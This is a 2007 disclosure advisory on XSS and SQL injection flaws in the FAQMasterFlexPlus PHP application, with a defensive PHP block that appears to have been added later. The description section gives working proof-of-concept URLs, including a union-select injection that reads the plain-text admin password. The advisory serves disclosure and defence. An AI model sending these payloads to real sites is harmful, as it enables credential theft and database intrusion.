faqmaster-multi.txt

Reported by Juan Galiana Lara, 29 Dec 2007. Source: packetstormsecurity.com (Packet Storm).

FAQMasterFlexPlus multiple vulnerabilities in PHP & MySQL, including XSS & SQL injection flaws, leading to admin password disclosure

- Security Advisory -  
  
  
- FAQMasterFlexPlus multiple vulnerabilities -  
---------------------------------------------------------------  
  
Product: FAQMasterFlexPlus  
Version: Latest version is affected, other not tested  
Vendor: http://www.netbizcity.com  
Affected by: Cross-Site Scripting & SQL injection  
  
  
  
  
  
I. Introduction.  
  
FaqMasterFlexPlus is a free, database-driven web-based application written  
in PHP for creating and maintaining  
Frequently Asked Questions (FAQs) on your web site.  
It has language support, and its features, according to the documentation, are: "Allow to  
create unlimited categories and unlimited  
Questions/Answers and has web-based category and FAQ administration with  
Add, Edit, Delete Capability."  
  
It's free software, released under the GNU General Public License (GPL).  
It works with PHP & MySQL and comes bundled in some versions of Fantastico  
(Cpanel X).  
  
  
  
II. Description  
  
Multiple flaws in FaqMasterFlexPlus have been discovered:  
  
  
1) Cross Site Scripting:  
  
The script faq.php suffers from an XSS bug: the variable $cat_name  
is not properly sanitized,  
and an attacker exploiting this flaw can perform an XSS attack to access the  
targeted user's cookies.  
  
All admin scripts to add/edit/delete categories and add/edit/delete FAQs  
also fail to correctly handle the user-supplied input.  
  
  
PoC:  
http://www.example.com/[path/to/faq/]/faq.php?category_id=1&cat_name=[XSS]  
  
  
  
2) SQL Injection (to exploit this issue it's necessary that magic_quotes_gpc is set  
to Off in the php.ini file).  
  
All the scripts are vulnerable to SQL injection attacks in their queries to the  
database.  
  
PoC:  
http://www.example.com/[path/to/faq]/faq.php?category_id=1'%20union%20select%201,1,user(),1/*  
  
  
The page then shows a new line like this:  
  
Q faquser@localhost  
  
  
or a Proof of Concept to get the admin password:  
  
  
http://www.example.com/[path/to/faq]/faq.php?category_id=1'%20union%20select%201,1,passwrd,1%20from%20users%20where%20userid='admin  
  
  
  
Q supersecretpassword  
  
  
bingo! ;)  
  
  
  
Besides, the password is stored in plain text, which is a big security flaw.  
  
  
  
This software contains many bugs and must be fully audited to  
enforce its security.  
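As an added, defender-side illustration (not code from FAQMasterFlexPlus or from this advisory), the following PHP puts the two defect classes described above next to their hardened forms: category_id validated and bound as an integer parameter instead of interpolated into the query, cat_name HTML-escaped before it is placed in the page, and the admin password stored as a password_hash() digest rather than in plain text. The users/userid/passwrd names follow the advisory's PoC, the faq table and the function names are hypothetical, and the sample rows are constructed; it runs against an in-memory SQLite database through PDO.

```php
<?php
// Added illustration, not FAQMasterFlexPlus code. Table name `faq` and all
// function names are hypothetical; users/userid/passwrd follow the advisory.

// Vulnerable pattern the advisory describes: the request parameter is pasted
// straight into the SQL text, so a quote in category_id rewrites the query.
// Kept only as the "before" for contrast; it is never executed here.
function vulnerableFaqQuery(string $categoryId): string
{
    return "SELECT id, question, answer FROM faq WHERE category_id = '$categoryId'";
}

// Hardened: category_id must be a decimal integer and is bound as a parameter,
// so the value can never become part of the SQL grammar. This holds whatever
// magic_quotes_gpc is set to (and that directive no longer exists in PHP >= 5.4).
function fetchFaqs(PDO $db, string $categoryId): array
{
    if (!ctype_digit($categoryId)) {
        throw new InvalidArgumentException('category_id must be a decimal integer');
    }
    $stmt = $db->prepare('SELECT id, question, answer FROM faq WHERE category_id = :cid');
    $stmt->execute([':cid' => (int) $categoryId]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened output: cat_name is HTML-escaped at the point it is rendered, which
// is what closes the reflected XSS on faq.php.
function renderCategoryHeading(string $catName): string
{
    return '<h2>' . htmlspecialchars($catName, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '</h2>';
}

// Password storage: keep a salted hash instead of the plain text, so even a
// successful read of the users table does not hand over the admin password.
function storeAdminPassword(PDO $db, string $userId, string $plain): void
{
    $stmt = $db->prepare('UPDATE users SET passwrd = :hash WHERE userid = :uid');
    $stmt->execute([':hash' => password_hash($plain, PASSWORD_DEFAULT), ':uid' => $userId]);
}

function verifyAdminPassword(PDO $db, string $userId, string $plain): bool
{
    $stmt = $db->prepare('SELECT passwrd FROM users WHERE userid = :uid');
    $stmt->execute([':uid' => $userId]);
    $hash = $stmt->fetchColumn();
    return $hash !== false && password_verify($plain, $hash);
}

// Demo against an in-memory SQLite database with constructed sample rows.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE faq (id INTEGER, category_id INTEGER, question TEXT, answer TEXT)');
$db->exec("INSERT INTO faq VALUES (1, 1, 'What is this?', 'A FAQ.')");
$db->exec('CREATE TABLE users (userid TEXT, passwrd TEXT)');
$db->exec("INSERT INTO users VALUES ('admin', '')");
storeAdminPassword($db, 'admin', 'correct horse battery staple');

print_r(fetchFaqs($db, '1'));
echo renderCategoryHeading('<script>alert(1)</script>'), "\n";
var_dump(verifyAdminPassword($db, 'admin', 'correct horse battery staple'));
var_dump(verifyAdminPassword($db, 'admin', 'wrong'));

// The advisory's union-select payload is refused before any SQL is built.
try {
    fetchFaqs($db, "1' union select 1,1,passwrd,1 from users where userid='admin");
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
```

The design point is that each of the three fixes sits at the trust boundary it protects: input validation plus parameter binding at the query, escaping at the output, and hashing at rest. Relying on magic_quotes_gpc instead, as the advisory's precondition hints, was never a fix, since it only escapes quotes for string contexts and cannot protect a bare integer comparison.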
  
  
  
  
III. Timeline  
  
08/05/2007 - Bugs discovered  
10/05/2007 - Vendor Contact (No Response)  
12/12/2007 - Vendor Contacted Again (No Response)  
28/12/2007 - Advisory Disclosure  
  
  
  
IV. Credits  
  
Juan Galiana <jgaliana gmail com>  
  
  
Regards  
